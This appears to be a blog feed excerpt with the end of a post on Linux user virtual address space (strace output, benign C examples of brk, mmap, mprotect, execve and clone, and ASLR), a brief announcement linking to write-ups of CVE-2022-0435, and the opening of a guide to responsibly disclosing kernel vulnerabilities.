</span></span></span><span class="line"><span class="cl"><span class="go">arch_prctl(0x3001 /* ARCH_??? */, 0x7ffe5d536650) = -1 EINVAL (Invalid argument)
</span></span></span><span class="line"><span class="cl"><span class="go">access(&#34;/etc/ld.so.preload&#34;, R_OK)      = -1 ENOENT (No such file or directory)
</span></span></span><span class="line"><span class="cl"><span class="go">openat(AT_FDCWD, &#34;/etc/ld.so.cache&#34;, O_RDONLY|O_CLOEXEC) = 3
</span></span></span><span class="line"><span class="cl"><span class="go">newfstatat(3, &#34;&#34;, {st_mode=S_IFREG|0644, st_size=185283, ...}, AT_EMPTY_PATH) = 0
</span></span></span><span class="line"><span class="cl"><span class="go">mmap(NULL, 185283, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fa129bcd000
</span></span></span><span class="line"><span class="cl"><span class="go">close(3)                                = 0
</span></span></span><span class="line"><span class="cl"><span class="go">openat(AT_FDCWD, &#34;/usr/lib/libc.so.6&#34;, O_RDONLY|O_CLOEXEC) = 3
</span></span></span><span class="line"><span class="cl"><span class="go">read(3, &#34;\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0&gt;\0\1\0\0\0\320\324\2\0\0\0\0\0&#34;..., 832) = 832
</span></span></span><span class="line"><span class="cl"><span class="go">pread64(3, &#34;\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0&#34;..., 784, 64) = 784
</span></span></span><span class="line"><span class="cl"><span class="go">pread64(3, &#34;\4\0\0\0@\0\0\0\5\0\0\0GNU\0\2\0\0\300\4\0\0\0\3\0\0\0\0\0\0\0&#34;..., 80, 848) = 80
</span></span></span><span class="line"><span class="cl"><span class="go">pread64(3, &#34;\4\0\0\0\24\0\0\0\3\0\0\0GNU\0\205vn\235\204X\261n\234|\346\340|q,\2&#34;..., 68, 928) = 68
</span></span></span><span class="line"><span class="cl"><span class="go">newfstatat(3, &#34;&#34;, {st_mode=S_IFREG|0755, st_size=2463384, ...}, AT_EMPTY_PATH) = 0
</span></span></span><span class="line"><span class="cl"><span class="go">mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fa129bcb000
</span></span></span><span class="line"><span class="cl"><span class="go">pread64(3, &#34;\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0&#34;..., 784, 64) = 784
</span></span></span><span class="line"><span class="cl"><span class="go">mmap(NULL, 2136752, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fa1299c1000
</span></span></span><span class="line"><span class="cl"><span class="go">mprotect(0x7fa1299ed000, 1880064, PROT_NONE) = 0
</span></span></span><span class="line"><span class="cl"><span class="go">mmap(0x7fa1299ed000, 1531904, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x2c000) = 0x7fa1299ed000
</span></span></span><span class="line"><span class="cl"><span class="go">mmap(0x7fa129b63000, 344064, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1a2000) = 0x7fa129b63000
</span></span></span><span class="line"><span class="cl"><span class="go">mmap(0x7fa129bb8000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1f6000) = 0x7fa129bb8000
</span></span></span><span class="line"><span class="cl"><span class="go">mmap(0x7fa129bbe000, 51888, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7fa129bbe000
</span></span></span><span class="line"><span class="cl"><span class="go">close(3)                                = 0
</span></span></span><span class="line"><span class="cl"><span class="go">mmap(NULL, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fa1299be000
</span></span></span><span class="line"><span class="cl"><span class="go">arch_prctl(ARCH_SET_FS, 0x7fa1299be740) = 0
</span></span></span><span class="line"><span class="cl"><span class="go">set_tid_address(0x7fa1299bea10)         = 28003
</span></span></span><span class="line"><span class="cl"><span class="go">set_robust_list(0x7fa1299bea20, 24)     = 0
</span></span></span><span class="line"><span class="cl"><span class="go">rseq(0x7fa1299bf0e0, 0x20, 0, 0x53053053) = 0
</span></span></span><span class="line"><span class="cl"><span class="go">mprotect(0x7fa129bb8000, 12288, PROT_READ) = 0
</span></span></span><span class="line"><span class="cl"><span class="go">mprotect(0x5622ec6d3000, 4096, PROT_READ) = 0
</span></span></span><span class="line"><span class="cl"><span class="go">mprotect(0x7fa129c30000, 8192, PROT_READ) = 0
</span></span></span><span class="line"><span class="cl"><span class="go">prlimit64(0, RLIMIT_STACK, NULL, {rlim_cur=8192*1024, rlim_max=RLIM64_INFINITY}) = 0
</span></span></span><span class="line"><span class="cl"><span class="go">munmap(0x7fa129bcd000, 185283)          = 0
</span></span></span><span class="line"><span class="cl"><span class="go">getrandom(&#34;\x62\xf6\x2b\x64\xd3\x81\xee\x98&#34;, 8, GRND_NONBLOCK) = 8
</span></span></span><span class="line"><span class="cl"><span class="go">brk(NULL)                               = 0x5622ee613000
</span></span></span><span class="line"><span class="cl"><span class="go">brk(0x5622ee634000)                     = 0x5622ee634000
</span></span></span><span class="line"><span class="cl"><span class="go">openat(AT_FDCWD, &#34;/usr/lib/locale/locale-archive&#34;, O_RDONLY|O_CLOEXEC) = 3
</span></span></span><span class="line"><span class="cl"><span class="go">newfstatat(3, &#34;&#34;, {st_mode=S_IFREG|0644, st_size=3053472, ...}, AT_EMPTY_PATH) = 0
</span></span></span><span class="line"><span class="cl"><span class="go">mmap(NULL, 3053472, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fa1296d4000
</span></span></span><span class="line"><span class="cl"><span class="go">close(3)                                = 0
</span></span></span><span class="line"><span class="cl"><span class="go">newfstatat(1, &#34;&#34;, {st_mode=S_IFCHR|0600, st_rdev=makedev(0x88, 0x1), ...}, AT_EMPTY_PATH) = 0
</span></span></span><span class="line"><span class="cl"><span class="go">openat(AT_FDCWD, &#34;/proc/self/maps&#34;, O_RDONLY) = 3
</span></span></span><span class="line"><span class="cl"><span class="go">newfstatat(3, &#34;&#34;, {st_mode=S_IFREG|0444, st_size=0, ...}, AT_EMPTY_PATH) = 0
</span></span></span><span class="line"><span class="cl"><span class="go">fadvise64(3, 0, 0, POSIX_FADV_SEQUENTIAL) = 0
</span></span></span><span class="line"><span class="cl"><span class="go">mmap(NULL, 139264, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fa129bd9000
</span></span></span><span class="line"><span class="cl"><span class="go">read(3, &#34;5622ec6c9000-5622ec6cb000 r--p 0&#34;..., 131072) = 2153
</span></span></span><span class="line"><span class="cl"><span class="go">write(1, &#34;5622ec6c9000-5622ec6cb000 r--p 0&#34;..., 21535622ec6c9000-5622ec6cb000 r--p 00000000 00:19 868257                     /usr/bin/cat
</span></span></span><span class="line"><span class="cl"><span class="go">5622ec6cb000-5622ec6d0000 r-xp 00002000 00:19 868257                     /usr/bin/cat
</span></span></span><span class="line"><span class="cl"><span class="go">5622ec6d0000-5622ec6d3000 r--p 00007000 00:19 868257                     /usr/bin/cat
</span></span></span><span class="line"><span class="cl"><span class="go">5622ec6d3000-5622ec6d4000 r--p 00009000 00:19 868257                     /usr/bin/cat
</span></span></span><span class="line"><span class="cl"><span class="go">5622ec6d4000-5622ec6d5000 rw-p 0000a000 00:19 868257                     /usr/bin/cat
</span></span></span><span class="line"><span class="cl"><span class="go">5622ee613000-5622ee634000 rw-p 00000000 00:00 0                          [heap]
</span></span></span><span class="line"><span class="cl"><span class="go">7fa1296d4000-7fa1299be000 r--p 00000000 00:19 2289972                    /usr/lib/locale/locale-archive
</span></span></span><span class="line"><span class="cl"><span class="go">7fa1299be000-7fa1299c1000 rw-p 00000000 00:00 0 
</span></span></span><span class="line"><span class="cl"><span class="go">7fa1299c1000-7fa1299ed000 r--p 00000000 00:19 2289282                    /usr/lib/libc.so.6
</span></span></span><span class="line"><span class="cl"><span class="go">7fa1299ed000-7fa129b63000 r-xp 0002c000 00:19 2289282                    /usr/lib/libc.so.6
</span></span></span><span class="line"><span class="cl"><span class="go">7fa129b63000-7fa129bb7000 r--p 001a2000 00:19 2289282                    /usr/lib/libc.so.6
</span></span></span><span class="line"><span class="cl"><span class="go">7fa129bb7000-7fa129bb8000 ---p 001f6000 00:19 2289282                    /usr/lib/libc.so.6
</span></span></span><span class="line"><span class="cl"><span class="go">7fa129bb8000-7fa129bbb000 r--p 001f6000 00:19 2289282                    /usr/lib/libc.so.6
</span></span></span><span class="line"><span class="cl"><span class="go">7fa129bbb000-7fa129bbe000 rw-p 001f9000 00:19 2289282                    /usr/lib/libc.so.6
</span></span></span><span class="line"><span class="cl"><span class="go">7fa129bbe000-7fa129bcd000 rw-p 00000000 00:00 0 
</span></span></span><span class="line"><span class="cl"><span class="go">7fa129bd9000-7fa129bfb000 rw-p 00000000 00:00 0 
</span></span></span><span class="line"><span class="cl"><span class="go">7fa129bfb000-7fa129bfd000 r--p 00000000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
</span></span></span><span class="line"><span class="cl"><span class="go">7fa129bfd000-7fa129c24000 r-xp 00002000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
</span></span></span><span class="line"><span class="cl"><span class="go">7fa129c24000-7fa129c2f000 r--p 00029000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
</span></span></span><span class="line"><span class="cl"><span class="go">7fa129c30000-7fa129c32000 r--p 00034000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
</span></span></span><span class="line"><span class="cl"><span class="go">7fa129c32000-7fa129c34000 rw-p 00036000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
</span></span></span><span class="line"><span class="cl"><span class="go">7ffe5d517000-7ffe5d538000 rw-p 00000000 00:00 0                          [stack]
</span></span></span><span class="line"><span class="cl"><span class="go">7ffe5d5c7000-7ffe5d5cb000 r--p 00000000 00:00 0                          [vvar]
</span></span></span><span class="line"><span class="cl"><span class="go">7ffe5d5cb000-7ffe5d5cd000 r-xp 00000000 00:00 0                          [vdso]
</span></span></span><span class="line"><span class="cl"><span class="go">ffffffffff600000-ffffffffff601000 --xp 00000000 00:00 0                  [vsyscall]
</span></span></span><span class="line"><span class="cl"><span class="go">) = 2153
</span></span></span><span class="line"><span class="cl"><span class="go">read(3, &#34;&#34;, 131072)                     = 0
</span></span></span><span class="line"><span class="cl"><span class="go">munmap(0x7fa129bd9000, 139264)          = 0
</span></span></span><span class="line"><span class="cl"><span class="go">close(3)                                = 0
</span></span></span><span class="line"><span class="cl"><span class="go">close(1)                                = 0
</span></span></span><span class="line"><span class="cl"><span class="go">close(2)                                = 0
</span></span></span><span class="line"><span class="cl"><span class="go">exit_group(0)                           = ?
</span></span></span><span class="line"><span class="cl"><span class="go">+++ exited with 0 +++
</span></span></span></code></pre></div><p>As we mentioned last time, there&rsquo;s <strong>a lot going on here</strong> for a program we expect to just be doing the equivalent of <code>read(/proc/self/maps)</code> and <code>write(stdout)</code>. In fact, on <strong>lines 47</strong> &amp; <strong>48</strong> we can see just that happening. So what&rsquo;s up with the rest?</p>
<p>I&rsquo;m thinking it might be out-of-scope for this post to do a line-by-line breakdown (maybe a more specific post about ELFs and processes and stuff?), but let&rsquo;s highlight some of the main syscalls used for setting up our memory mapping:</p>
<h4 id="brk">brk()</h4>
<p>The <code>brk()</code> syscall is used to adjust the location of the &ldquo;program break&rdquo;, which defines the end of the process&rsquo;s data segment (aka end of the heap).</p>
<p>❓</p>
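<p><code>int brk(void *addr);</code></p>
<p>That&rsquo;s the glibc wrapper&rsquo;s prototype, which returns 0 or -1; the raw Linux syscall that <code>strace</code> shows us instead returns the resulting program break. <code>brk(NULL)</code> makes no adjustment, so it returns the current program break. We can see this on <strong>line 3</strong>, likely called during initialisation so that memory management code like malloc can figure out where the heap currently ends.</p>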
<p>Later on <strong>line 37</strong> we can see another call to <code>brk()</code>, asking to extend the program break to <code>0x5622ee634000</code>. If we take a look at the <code>maps</code> output on <strong>line 53</strong>, we can in fact see the heap does end at <code>0x5622ee634000</code> now! Sweet :)</p>
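<p>To see the program break move for ourselves, here&rsquo;s a rough sketch using glibc&rsquo;s <code>sbrk()</code>, which sits on top of the same mechanism (<code>sbrk(0)</code> plays the role of the <code>brk(NULL)</code> query in the trace). The helper names <code>current_break()</code> and <code>grow_break()</code> are my own, and this assumes nothing else (e.g. malloc) moves the break between the calls.</p>

```c
#define _DEFAULT_SOURCE   /* expose sbrk() in <unistd.h> on glibc */
#include <assert.h>
#include <stdint.h>
#include <unistd.h>

/* Returns the current program break, like the brk(NULL) calls in the trace. */
static void *current_break(void)
{
    return sbrk(0);
}

/* Moves the break up by `bytes`; returns the new break, or NULL on failure. */
static void *grow_break(intptr_t bytes)
{
    assert(bytes >= 0);
    if (sbrk(bytes) == (void *)-1)
        return NULL;
    return sbrk(0);
}
```

<p>Calling <code>current_break()</code>, then <code>grow_break(4096)</code>, should show the break sitting 4096 bytes higher, and the <code>[heap]</code> entry in <code>maps</code> growing to match.</p>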
<h4 id="mmap">mmap()</h4>
<p>This is the big gun, responsible for the fabled &ldquo;mappings&rdquo; we&rsquo;ve been yapping on about. The <code>mmap()</code> syscall is used to create memory mappings (and <code>munmap()</code> for unmapping them). For more info on args and more, don&rsquo;t forget to consult <code>man 2 mmap</code>.</p>
<p>❓</p>
<p><code>void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset);</code></p>
<p>Remember, we can use <code>mmap()</code> to either map a file or device to virtual memory or simply to allocate a blank region of memory to a virtual address:</p>
<ul>
<li>On <strong>line 10</strong> we <code>openat()</code> our libc, identified by file descriptor 3. Then in <strong>lines 18-22</strong> we can see we make a series of <code>mmap()</code> calls with the fd arg set to 3; we can then cross-reference the permissions (e.g. <code>PROT_READ|PROT_WRITE</code>) and returned addresses with the libc mappings we can see in our <code>maps</code> output on <strong>lines 56-61</strong></li>
<li>Conversely, we can see some anonymous mappings, where the fd is set to <code>-1</code> and <code>mmap()</code> is passed the flag <code>MAP_ANONYMOUS</code>, like <strong>line 46</strong> [2]</li>
</ul>
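<p>Both flavours described above can be sketched in a few lines of C. This is just an illustration with helper names I&rsquo;ve made up (<code>map_anonymous()</code>, <code>map_file_readonly()</code>); the file-backed one mirrors the open, stat, <code>mmap()</code>, close sequence we saw the loader use for <code>/etc/ld.so.cache</code> in the trace.</p>

```c
#define _DEFAULT_SOURCE   /* MAP_ANONYMOUS, O_CLOEXEC on glibc */
#include <assert.h>
#include <fcntl.h>
#include <stddef.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

/* Maps `len` bytes of zero-filled, private anonymous memory, or NULL. */
static void *map_anonymous(size_t len)
{
    void *p = mmap(NULL, len, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    return p == MAP_FAILED ? NULL : p;
}

/* Maps a whole file read-only; stores its size in *len_out. NULL on error. */
static void *map_file_readonly(const char *path, size_t *len_out)
{
    assert(path != NULL && len_out != NULL);
    int fd = open(path, O_RDONLY | O_CLOEXEC);
    if (fd < 0)
        return NULL;

    struct stat st;
    if (fstat(fd, &st) < 0 || st.st_size == 0) {
        close(fd);
        return NULL;
    }

    void *p = mmap(NULL, (size_t)st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
    close(fd);   /* the mapping stays valid after the fd is closed */
    if (p == MAP_FAILED)
        return NULL;

    *len_out = (size_t)st.st_size;
    return p;
}
```

<p>Mapping an ELF file this way and peeking at the first four bytes should show the same <code>\177ELF</code> magic that turns up in the <code>read()</code> of libc on line 11 of the trace.</p>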
<h4 id="mprotect">mprotect()</h4>
<p>If <code>mmap()</code> is the big gun, then <code>mprotect()</code> is the syscall used to set the protections for a mapped region of memory (yeah, I couldn&rsquo;t think of an analogy okay). Typically these protections may be any combination of read, write and execute access flags.</p>
<p>❓</p>
<p><code>int mprotect(void *addr, size_t len, int prot);</code></p>
<p>While we can include protection flags via the <code>prot</code>  arg for <code>mmap()</code>, <code>mprotect()</code> allows us to set page granular access flags which we can update with each call, without having to map new regions of memory each time.</p>
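<p>As a small sketch of that &ldquo;map first, tighten later&rdquo; pattern: the helper below (name is mine) maps a writable page, fills it in, then drops write access with <code>mprotect()</code>. The second helper forks a child that tries to write to the page anyway, so we can observe the resulting <code>SIGSEGV</code> without taking down our own process.</p>

```c
#define _DEFAULT_SOURCE   /* MAP_ANONYMOUS on glibc */
#include <assert.h>
#include <signal.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <unistd.h>

/* Maps one RW page, copies `msg` in, then makes the page read-only. */
static char *make_readonly_page(const char *msg)
{
    assert(msg != NULL);
    size_t page = (size_t)sysconf(_SC_PAGESIZE);
    char *p = mmap(NULL, page, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED)
        return NULL;

    /* The page starts zero-filled, so the copy stays NUL-terminated. */
    strncpy(p, msg, page - 1);

    if (mprotect(p, page, PROT_READ) != 0) {
        munmap(p, page);
        return NULL;
    }
    return p;
}

/* Returns 1 if writing to `p` kills a child with SIGSEGV, 0 if not, -1 on error. */
static int write_faults(char *p)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        *(volatile char *)p = 'X';   /* should fault on a read-only page */
        _exit(0);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFSIGNALED(status) && WTERMSIG(status) == SIGSEGV;
}
```

<p>Reads from the page keep working after the <code>mprotect()</code> call; it&rsquo;s only the write that trips the fault.</p>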
<h4 id="execve">execve()</h4>
<p>Some of you might have noticed that while we can see regions being mapped for locale-archive and libc, there&rsquo;s no sign of <code>/usr/bin/cat</code> itself. So what happened to it? Again, trying to keep within the scope of virtual memory, this setup is handled by the initial <code>execve()</code> system call on <strong>line 2</strong>.</p>
<p>❓</p>
<p><code>int execve(const char *pathname, char *const argv[], char *const envp[]);</code></p>
<p>Once a new process has been forked (created), <code>execve()</code> then &ldquo;executes the program referred to by <code>pathname</code>&rdquo; [3]. This initial call to <code>execve()</code> parses our ELF file <code>/usr/bin/cat</code> and initialises the necessary segments (e.g. text, stack, heap and data).</p>
<p>It&rsquo;s worth noting that when a process is created, it is done via <code>fork()</code>, which creates a new process by duplicating the calling process. However, <code>execve()</code> will create a new and empty virtual address space for the application at <code>pathname</code>.</p>
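<p>The fork-then-exec dance described above looks roughly like this in C. It&rsquo;s a minimal sketch, not what a real shell does in full: <code>run_program()</code> is a name I&rsquo;ve picked, and the 127 exit code for a failed <code>execve()</code> is just borrowed from shell convention.</p>

```c
#include <assert.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/*
 * Forks a child, replaces its (duplicated) address space with the program
 * at `path`, and returns the child's exit status, or -1 on error.
 */
static int run_program(const char *path, char *const argv[],
                       char *const envp[])
{
    assert(path != NULL);
    pid_t pid = fork();
    if (pid < 0)
        return -1;

    if (pid == 0) {
        /* On success execve() never returns: the old mappings are gone. */
        execve(path, argv, envp);
        _exit(127);   /* only reached if execve() failed */
    }

    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

<p>For example, passing <code>"/usr/bin/cat"</code> with an argv of <code>{"cat", "/proc/self/maps", NULL}</code> should print the child&rsquo;s fresh set of mappings rather than a copy of the parent&rsquo;s.</p>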
<hr>
<ol>
<li>A deep dive on syscalls is out of scope for this post, but I might touch on it down the line. In the meantime, <code>man</code> pages are your friend, try <code>man syscalls</code> :)</li>
<li>Honestly, without digging some more not 100% sure what these are being used for, though likely for something by the shared libs - exercise for the reader? :P</li>
<li>Surprise, surprise this is from <code>man 2 execve</code>!</li>
</ol>
<h3 id="threads">Threads</h3>
<p>So, we&rsquo;ve talked a lot about how our usermode processes live in happy isolation within their sandboxed virtual address spaces. Is this <em><strong>always</strong></em> the case? Nope, and one reason is threads.</p>
<p>Threads are essentially light-weight processes and represent a flow of execution within an application. The reason they&rsquo;re &ldquo;light-weight processes&rdquo; is that when threads are created, instead of using <code>fork()</code> they use a similar system call, <code>clone()</code>.</p>
<p><code>clone()</code> is also used to create a process, but allows more control over what resources are shared between the parent and child. As a result, in Linux, threads <em><strong>share</strong></em> the same virtual address space and mappings, heap included, though each thread gets its own stack mapping within it.</p>
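<p>To make the sharing concrete, here&rsquo;s a hedged sketch using glibc&rsquo;s <code>clone()</code> wrapper directly. It is not how a threading library actually creates threads (that involves several more flags); it only toggles <code>CLONE_VM</code> to show the difference between a shared and a duplicated address space. The names <code>child_fn()</code> and <code>run_child()</code> are illustrative.</p>

```c
#define _GNU_SOURCE   /* clone() and CLONE_VM in <sched.h> */
#include <assert.h>
#include <sched.h>
#include <signal.h>
#include <stdlib.h>
#include <sys/wait.h>

/* Runs in the child: writes 42 through the pointer it was handed. */
static int child_fn(void *arg)
{
    *(int *)arg = 42;
    return 0;
}

/*
 * Clones a child that writes to one of our variables. With share_vm set,
 * the child shares our address space, so we see its write; without it the
 * child gets its own copy and our variable is untouched.
 * Returns the value the parent sees afterwards, or -1 on error.
 */
static int run_child(int share_vm)
{
    const size_t stack_size = 64 * 1024;
    char *stack = malloc(stack_size);   /* the child needs its own stack */
    if (stack == NULL)
        return -1;

    volatile int value = 0;
    int flags = SIGCHLD | (share_vm ? CLONE_VM : 0);

    /* Stacks grow down on x86_64, so pass the top of the buffer. */
    pid_t pid = clone(child_fn, stack + stack_size, flags, (void *)&value);
    if (pid < 0 || waitpid(pid, NULL, 0) < 0) {
        free(stack);
        return -1;
    }

    free(stack);
    return value;
}
```

<p>With <code>CLONE_VM</code> the parent should read back 42; without it, the write lands in the child&rsquo;s private copy and the parent still sees 0.</p>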
<h3 id="aslr">ASLR</h3>
<p>Some of you eager enough to run these commands multiple times may have noticed that the addresses for your mappings change each time you run <code>cat</code>, what gives?</p>
<p><img src="https://sam4k.com/content/images/2022/03/confused_girl.gif" alt=""></p>
<p>Without deviating too off-topic, this is actually normal! It&rsquo;d be more concerning if nothing changed, as this is the result of a mitigation called ASLR: Address Space Layout Randomisation [1].</p>
<p>ASLR does exactly what it says on the tin, randomising by default the virtual addresses that the stack, heap and shared libraries are mapped to each time the program is run. This helps mitigate exploitation techniques that rely on knowing where stuff is in memory!</p>
<p>Modern compilers are also able to compile code as &ldquo;position independent&rdquo; [2], which tl;dr means we can also randomise the virtual address of the executable code as well! Pretty neat :)</p>
<p>Of course, I&rsquo;d be remiss if I didn&rsquo;t mention there&rsquo;s a procfs file to check whether ASLR is currently enabled: <code>cat /proc/sys/kernel/randomize_va_space</code> [3]</p>
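<p>The same check can be done from C. In this sketch the helper names are mine; the meaning of the values 0, 1 and 2 follows the kernel&rsquo;s sysctl documentation, and anything else is simply reported as unknown.</p>

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Reads the current ASLR mode from procfs; returns -1 if it can't be read. */
static int read_aslr_mode(void)
{
    FILE *f = fopen("/proc/sys/kernel/randomize_va_space", "r");
    if (f == NULL)
        return -1;

    int mode = -1;
    if (fscanf(f, "%d", &mode) != 1)
        mode = -1;
    fclose(f);
    return mode;
}

/* Short description of each documented randomize_va_space value. */
static const char *describe_aslr_mode(int mode)
{
    switch (mode) {
    case 0:  return "disabled";
    case 1:  return "stack, mmap base and vDSO randomised";
    case 2:  return "as 1, plus the brk()-managed heap";
    default: return "unknown";
    }
}
```

<p>On most modern distros I&rsquo;d expect <code>read_aslr_mode()</code> to return 2, but that is down to your system&rsquo;s configuration.</p>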
<hr>
<ol>
<li><a href="https://en.wikipedia.org/wiki/Address_space_layout_randomization">https://en.wikipedia.org/wiki/Address_space_layout_randomization</a></li>
<li><a href="https://en.wikipedia.org/wiki/Position-independent_code#:~:text=In%20computing,%20position-independent%20code,regardless%20of%20its%20absolute%20address">https://en.wikipedia.org/wiki/Position-independent_code</a></li>
<li><a href="https://linux-audit.com/linux-aslr-and-kernelrandomize_va_space-setting/">https://linux-audit.com/linux-aslr-and-kernelrandomize_va_space-setting/</a></li>
</ol>
<h3 id="wrapping-up-in-uvas">Wrapping Up In UVAS</h3>
<p><img src="https://sam4k.com/content/images/2022/03/we_did_it.gif" alt=""></p>
<p>And there we have it! Hopefully this has provided a high level overview of the user virtual address space, we&rsquo;ve covered:</p>
<ul>
<li>That the virtual address space is split up into two sections, the lower half being the unprivileged user virtual address space (UVAS)</li>
<li>Userspace is limited in what it can do, but can ask the kernel to perform privileged actions on its behalf via the system call interface</li>
<li>We looked at what a typical application, <code>cat</code>, uses the UVAS for: loading and mapping the code and data into memory, allocating memory for the heap and stack as well as mapping in library files such as libc and locale information</li>
<li>Next we took a brief look at the system calls that userspace applications can use to get the kernel to set up their virtual address space</li>
</ul>
<h2 id="next-time">Next Time!</h2>
<p>Can you believe I planned to wrap everything up in this post? Of course I did, whoops! Suffice to say, we still have a lot to cover in an indeterminate number of posts!</p>
<p>Coming up we&rsquo;ll context switch and take a closer look at what goes on in the kernel virtual address space and how it&rsquo;s mapped. After that, we&rsquo;ll get technical as we figure out how all this is implemented via the kernel and hardware features.</p>
<p>Thanks for reading!</p>
<p>exit(0);</p>
]]></content:encoded></item><item><title>CVE-2022-0435: A Remote Stack Overflow in The Linux Kernel</title><description>Recently I discovered a vulnerability in the Linux kernel that&amp;#39;s been lurking there since 4.8 (July 2016)! CVE-2022-0435 is a remotely and locally exploitable stack overflow in the TIPC networking module of the Linux kernel</description><link>https://sam4k.com/cve-2022-0435-a-remote-stack-overflow-in-the-linux-kernel/</link><guid isPermaLink="false">620c2d361b5b6d052837b0c7</guid><category>linux</category><category>kernel</category><category>xdev</category><dc:creator>sam4k</dc:creator><pubDate>Tue, 15 Feb 2022 23:00:00 +0000</pubDate><media:content url="https://sam4k.com/content/images/2022/02/what.gif" medium="image"/><content:encoded><![CDATA[<p>My last post, a <a href="https://sam4k.com/a-dummys-guide-to-disclosing-linux-kernel-vulnerabilities/">guide on disclosing Linux kernel vulns</a>, might have been a bit of a giveaway, but recently I discovered a vulnerability in the Linux kernel that&rsquo;s been lurking there since 4.8 (July 2016)!</p>
<p>Now that the embargo is up, I can share it with the world! <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0435">CVE-2022-0435</a> is a remotely and locally exploitable stack overflow in the TIPC networking module of the Linux kernel (don&rsquo;t worry, if you haven&rsquo;t heard of TIPC, it probably isn&rsquo;t loaded by default on your distro).</p>
<h2 id="find-out-more">Find Out More</h2>
<p>If you want a <strong>brief technical overview</strong> of the vulnerability, check out the advisory I posted to the oss-security mailing list:</p>
<p><a href="https://seclists.org/oss-sec/2022/q1/130">oss-sec: CVE-2022-0435: Remote Stack Overflow in Linux Kernel TIPC Module since 4.8 (net/tipc)</a></p>
<p>For a more <strong>detailed analysis</strong> of the vulnerability, covering the same content as the advisory, check out my blog post over on the Immunity blog:</p>
<p><a href="https://web.archive.org/web/20240330111237/https://blog.immunityinc.com/p/a-remote-stack-overflow-in-the-linux-kernel/">CVE-2022-0435: A Remote Stack Overflow in The Linux Kernel</a></p>
<p>Focusing more on exploitation, I discuss the work and techniques involved in writing a contemporary remote kernel exploit, using CVE-2022-0435 as a case-study:</p>
<p><a href="https://web.archive.org/web/20240330065352/https://blog.immunityinc.com/p/writing-a-linux-kernel-remote-in-2022/">Writing a Linux Kernel Remote in 2022</a></p>
<h2 id="get-in-touch">Get in Touch!</h2>
<p>General reminder that if you have any questions / corrections / suggestions / requests for content, regarding CVE-2022-0435 or any of my Linuxy security-y stuff, feel free to @ me on <a href="https://twitter.com/sam4k1">Twitter</a>!</p>
<p>exit(0);</p>
]]></content:encoded></item><item><title>A Dummy's Guide to Disclosing Linux Kernel Vulnerabilities</title><description>A post sharing some insights into the process behind responsibly disclosing vulnerabilities in the Linux kernel...</description><link>https://sam4k.com/a-dummys-guide-to-disclosing-linux-kernel-vulnerabilities/</link><guid isPermaLink="false">61fae6ff7742d008b38dceb4</guid><category>linux</category><category>kernel</category><category>vr</category><dc:creator>sam4k</dc:creator><pubDate>Sat, 05 Feb 2022 19:58:40 +0000</pubDate><media:content url="https://sam4k.com/content/images/2022/02/confused_larry.gif" medium="image"/><content:encoded><![CDATA[<p>Bit of a niche one today, but my hope is that at least one person will be able to avoid some of the hurdles I had to tackle and the rest will at least get an interesting insight into the process behind responsibly disclosing vulnerabilities in the Linux kernel.</p>
<p>For context, I recently started my new position as a Sr. Security Researcher and during some of my research I discovered a fairly serious looking vulnerability in a part of the Linux kernel - pretty exciting right?! After <del>double</del> <del>triple</del> quadruple checking what I thought I found was, in fact, what I thought I found (and a couple of fist pumps later) - I asked my boss: what do now???</p>
<p>And that brings you all up to speed, as the post below is the culmination of my various Googlings, sifting through docs, advice from community members and maintainers, and an array of gotchas encountered, all in the pursuit of answering the question: what do now?!</p>
<h2 id="contents">Contents</h2>
<ul>
<li><a href="#some-more-important-context">Some More (Important) Context</a></li>
<li><a href="#initial-preparation">Initial Preparation</a></li>
<li><a href="#the-disclosure-process">The Disclosure Process</a>
<ul>
<li><a href="#0x00-an-overview">0x00 An Overview</a></li>
<li><a href="#0x01-first-contact">0x01 First Contact</a></li>
<li><a href="#0x02-patching-follow-up">0x02 Patching &amp; Follow Up</a>
<ul>
<li><a href="#including-a-patch">Including a Patch</a></li>
</ul>
</li>
<li><a href="#0x03-public-disclosure">0x03 Public Disclosure</a></li>
</ul>
</li>
<li><a href="#wrapping-up">Wrapping Up</a></li>
</ul>
<h2 id="some-more-important-context">Some More (Important) Context</h2>
